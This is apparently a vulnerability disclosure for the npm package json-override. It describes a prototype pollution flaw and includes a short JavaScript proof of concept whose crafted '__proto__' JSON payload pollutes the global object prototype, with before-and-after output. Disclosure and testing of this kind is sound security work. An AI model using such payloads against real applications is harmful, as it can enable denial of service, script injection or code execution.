Affected versions of this package are vulnerable to Prototype Pollution due to recursive assignment of properties from source to destination, an attacker can exploit this by injecting __proto__
as a key at the source which cause pollution to the global prototype, this can be escalated to Denial of service, remote code execution or cross-site scripting attacks based on the implementation of the package.
json-override/json-override.js:18
(async () => {
const lib = await import('json-override');
var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
lib.default ({}, BAD_JSON)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();
Output:
Before Attack: {}
After Attack: {"polluted":true}
No updates provided by the maintainer following two months of reporting the vulnerability